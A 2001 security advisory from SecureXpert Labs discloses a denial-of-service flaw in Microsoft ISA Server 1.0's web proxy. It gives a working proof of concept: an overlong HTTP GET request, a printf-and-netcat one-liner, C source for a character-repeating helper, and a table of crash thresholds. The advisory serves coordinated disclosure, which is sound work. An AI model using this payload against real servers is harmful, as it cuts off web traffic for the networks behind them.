ISA.dos.txt

`FSC Internet Corp. / SecureXpert Labs Advisory [SX-20010320-2]  
  
Denial of Service in Microsoft ISA server v1.0  
  
  
Summary  
  
Microsoft ISA Server 1.0 on Windows 2000 Server SP1 is vulnerable to a  
simple network-based attack which stops all incoming and outgoing web  
traffic from passing through the firewall until the firewall is rebooted  
or the affected service is restarted.  
  
If the firewall is configured to use the "Web Publishing" feature (inbound  
HTTP proxy to a web server), this attack can be performed remotely.  
  
  
Details  
  
Microsoft ISA server includes a web proxy component (W3PROXY.EXE) that is used  
for both the "publishing" of internal web servers to the external network and  
for proxying of internal requests to external web servers.  
  
Sending a URL with a long pathname component to this proxy will cause it to  
terminate with an access violation error.  
  
For example, sending the (valid) HTTP request:  
  
GET http://hostname/aaa[3000 more occurences of 'a'] HTTP/1.0\n\n  
  
to port 80 on the ISA Server's external interface will cause W3PROXY.EXE to  
terminate with an access violation.  
  
This can easily be reproduced from a Linux system by using the following simple  
shell command:  
  
printf 'GET http://${HOST}/%s HTTP/1.0\n\n' `./repeat ${x} ${y}` | \  
nc ${HOST} 80  
  
where:  
- printf is the shell utility of that name  
- ${HOST} is an environment variable set to a hostname which resolves to the  
external IP of the ISA server  
- ./repeat is the simple C program whose source is given below  
- ${x} is the ASCII value of the character to insert into the generated URL  
- ${y} is the number of repetions of ${x}  
  
The `repeat' program can be compiled from the following simple C source:  
  
/*  
* repeat.c -- quick-n-dirty hack to output argv[2] instances of the  
* character whose ASCII value is given as argv[1]  
*  
* WARNING - this has absolutely no error checking!  
*/  
  
#include <stdio.h>  
  
main (int argc, char **argv) {  
int character;  
long repetitions, i;  
  
if ( argc != 3 ) {  
printf("usage: repeat char reps\n");  
exit(1);  
}  
character = atoi(argv[1]);  
repetitions = atol(argv[2]);  
  
for (i = 0L; i < repetitions; i++) {  
printf ("%c", character);  
}  
}  
  
The behaviour of W3PROXY.EXE is dependent both on the value of ${x} and the  
value of ${y}. With ${x} of 55, the following behavious is observed based on  
the value of ${y}:  
  
100: processes correctly, returns "404 Object Not Found" from target web server.  
200: returns 404  
250: returns 404  
254: returns 404  
255: returns "414 URL Too Long"  
260: returns 414  
300: returns 414  
2000: returns 414  
2100: returns 414  
2200: returns 414  
2300: returns 414  
2300, repeated several times: W3PROXY.EXE grows to 128MB of process size and  
is then terminated with an access violation.  
2350: W3PROXY.EXE is terminated on the first attempt.  
All larger values: as 2350, above.  
  
With different values of ${x}, different behaviour is observed for some values  
of ${y}. This, along with preliminary analyis of the Dr. Watson logs generated  
upon termination of W3PROXY.EXE, initially suggested that an exploitable overflow  
may have been present. However, source code analysis by Microsoft has indicated  
that only a heap overflow is present, and therefore that this vulnerability is  
not exploitable beyond denial of service.  
  
  
Status  
  
Microsoft Corp. was informed of this vulnerability on April 2, 2001.  
A hotfix to address this issue will be released on April 16, 2001,  
synchronized with the release of this advisory.  
  
  
Credits  
  
Richard Reiner, SecureXpert Labs  
Graham Wiseman, SecureXpert Labs  
Matthew Siemens, SecureXpert Labs  
Kent Nicolson, SecureXpert Labs  
  
  
About SecureXpert DIRECT  
  
SecureXpert DIRECT is an advance security advisory service provided to qualified  
subscribers by SecureXpert Labs. Subscriptions are free of charge and may be  
obtained at http://www.securexpert.com/services.html.  
`